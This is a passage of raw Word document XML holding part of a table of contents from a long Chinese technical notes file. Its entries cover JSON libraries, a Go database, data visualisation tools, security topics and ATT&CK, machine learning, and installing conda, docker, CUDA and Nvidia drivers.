                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>845</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="089F0DEC" w14:textId="3E098FC6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780198" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gson</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>区别</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780198 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>845</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58E5CB69" w14:textId="0A1582FE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780199" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>golang bolt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780199 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>846</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02B954BA" w14:textId="7F92EB90" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780200" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据可视化：数据或地图</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780200 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>846</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AF409A3" w14:textId="2089EC96" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780201" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tableau</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780201 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>846</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F22702F" w14:textId="162830F4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780202" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gephi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780202 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>847</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07368DE0" w14:textId="14B0E31A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780203" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780203 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>848</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52ED72D6" w14:textId="22F0CB7D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780204" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>地图绘制工具</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780204 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>848</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A5B58E0" w14:textId="59EA999F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780205" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安全服务技能</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780205 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>849</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D6D811D" w14:textId="47939555" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780206" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ATT&amp;CK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780206 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>849</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CFEF334" w14:textId="0B7F68F6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780207" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780207 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>849</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BC4D82D" w14:textId="2EC8B879" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780208" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>站唐老师学习</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780208 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>850</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39A5F85C" w14:textId="1A804900" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780209" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>鹏哥在大显卡机器安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>、环境等的文档</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780209 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>850</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F35BC3C" w14:textId="46EDCA64" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780210" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>环境安装测试代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780210 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>850</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B832955" w14:textId="3A5CDB2E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780211" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:noProof/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>Ubuntu install nvidia driver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780211 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>851</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31D56C0F" w14:textId="736B8044" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780212" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:noProof/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>Conda</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780212 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>856</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="639F4E8B" w14:textId="10356F7F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780213" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cuda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>torch</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cudnn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780213 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>856</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71951531" w14:textId="624797F3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780214" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nvidia</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>驱动</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
